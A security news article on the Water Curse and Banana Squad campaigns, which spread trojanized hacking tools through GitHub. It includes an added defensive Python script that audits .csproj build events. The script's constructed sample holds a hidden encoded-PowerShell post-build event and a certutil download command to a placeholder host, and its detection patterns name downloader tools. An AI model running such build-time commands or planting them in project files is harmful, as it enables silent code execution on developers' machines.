Security researchers at Trend Micro and ReversingLabs have uncovered two recent campaigns targeting red teams, novice cybercriminals, and developer environments through trojanized open source hacking tools.
Attributed by Trend Micro to a threat actor named Water Curse, one of the campaigns involved at least 76 GitHub accounts linked to repositories that had malicious payloads injected into build scripts and project files.
The payloads were designed to steal credentials, browser data, and session tokens, as well as to give the threat actor persistent remote access to the compromised systems.
According to Trend Micro, Water Curse is a financially motivated adversary that likely began using GitHub accounts for malicious activity in March 2023.
“Water Curse primarily targets red teams and penetration testers, developers, and gamers, reflecting a hybrid strategy that blends supply chain compromise with opportunistic exploitation across digital communities,” the cybersecurity firm notes.
The threat actor hid the malicious payloads in the Visual Studio project configuration files of an SMTP email bomber and Sakura RAT. Tools employed throughout the campaign include C#, JavaScript, PowerShell, and VBS scripts, as well as compiled PE binaries.
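A practical takeaway from the project-file technique is that MSBuild runs whatever a project's PreBuildEvent, PostBuildEvent, Exec tasks and inline UsingTask factories tell it to, so cloning and building a repository is enough to execute a hidden payload. The following Python check is an added example, not code from the article or from Trend Micro or ReversingLabs: it inventories every build-time command in a .csproj and scores the ones that match encoded or hidden PowerShell, in-memory execution, or LOLBin downloader patterns. The sample project file, the regular expressions and the severity labels are assumptions for illustration; the sample is constructed and is not taken from the campaign.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample .csproj (not from the campaign): one legitimate copy step,
# one hidden encoded-PowerShell post-build event, one certutil download.
SAMPLE_CSPROJ = """<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <PostBuildEvent>powershell -w hidden -nop -enc SQBFAFgA</PostBuildEvent>
  </PropertyGroup>
  <Target Name="AfterBuild">
    <Exec Command="cmd /c copy $(TargetPath) $(OutDir)backup\\" />
    <Exec Command="certutil -urlcache -split -f http://example.invalid/x.exe %TEMP%\\x.exe" />
  </Target>
  <ItemGroup>
    <Compile Include="Program.cs" />
  </ItemGroup>
</Project>
"""

# Property elements whose text is run as a shell command during the build.
EVENT_ELEMENTS = {"PreBuildEvent", "PostBuildEvent"}

# Assumed high-risk indicators: hidden/encoded PowerShell, in-memory execution,
# and living-off-the-land downloaders. Tune these for your own environment.
HIGH_RISK_PATTERNS = [
    re.compile(p, re.IGNORECASE)
    for p in (
        r"powershell(\.exe)?\b.*(\s-e(nc|ncodedcommand)?\s|-w(indowstyle)?\s+hidden"
        r"|invoke-expression|\biex\b|downloadstring|frombase64string)",
        r"\bcertutil(\.exe)?\b.*-urlcache",
        r"\bbitsadmin(\.exe)?\b",
        r"\b(curl|wget|invoke-webrequest|iwr)\b",
        r"\b(mshta|rundll32|regsvr32)(\.exe)?\b",
    )
]


def _local(tag):
    """Strip the MSBuild XML namespace so old-style and SDK-style projects parse alike."""
    return tag.rsplit("}", 1)[-1]


def _severity(command):
    """'high' if the command matches a downloader/obfuscation pattern, else 'review'."""
    return "high" if any(p.search(command) for p in HIGH_RISK_PATTERNS) else "review"


def audit_project(xml_text):
    """Return every build-time command found in a .csproj/.vbproj, with a severity.

    Build events are a legitimate MSBuild feature, so every command is reported
    for review; only commands matching HIGH_RISK_PATTERNS are marked 'high'.
    """
    root = ET.fromstring(xml_text)
    findings = []
    for elem in root.iter():
        name = _local(elem.tag)
        if name in EVENT_ELEMENTS and elem.text and elem.text.strip():
            cmd = elem.text.strip()
            findings.append({"where": name, "command": cmd, "severity": _severity(cmd)})
        elif name == "Exec" and elem.get("Command"):
            cmd = elem.get("Command").strip()
            findings.append({"where": "Exec", "command": cmd, "severity": _severity(cmd)})
        elif name == "UsingTask" and elem.get("TaskFactory"):
            # Inline tasks (CodeTaskFactory / RoslynCodeTaskFactory) compile and run
            # arbitrary C#/VB at build time, so they always deserve a look.
            findings.append({"where": "UsingTask",
                             "command": elem.get("TaskFactory"), "severity": "review"})
    return findings


def high_risk(xml_text):
    """Only the findings an analyst should look at first."""
    return [f for f in audit_project(xml_text) if f["severity"] == "high"]


if __name__ == "__main__":
    for f in audit_project(SAMPLE_CSPROJ):
        print(f"[{f['severity']:6}] {f['where']}: {f['command']}")
```

Run this against every .csproj, .vbproj and .targets file in a repository before building it. The plain copy command is reported as "review" rather than "high", which is deliberate: the value of the inventory is that a reviewer sees every command the build would execute, not only the ones a regex happens to recognise.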
ReversingLabs has uncovered a campaign involving more than 67 GitHub repositories promising Python-based hacking tools, but delivering trojanized look-alikes of other repositories.
As part of the campaign, attributed to a threat actor named Banana Squad, each GitHub account had only one repository listed under its name, suggesting that malware distribution was the sole purpose of every one of them.
The campaign began in early June, but ReversingLabs linked it to earlier reports on similar malicious activity flagged by Checkmarx in 2023.
Both incidents mirror a campaign recently uncovered by Sophos, which appears linked to a distribution-as-a-service (DaaS) operation that has been ongoing since 2022, and which has used thousands of GitHub accounts to distribute malware embedded in open source tools.
Related: Malicious NPM Packages Disguised as Express Utilities Allow Attackers to Wipe Systems
Related: Cyber Insights 2025: Open Source and Software Supply Chain Security
Related: Open Source Package Entry Points May Lead to Supply Chain Attacks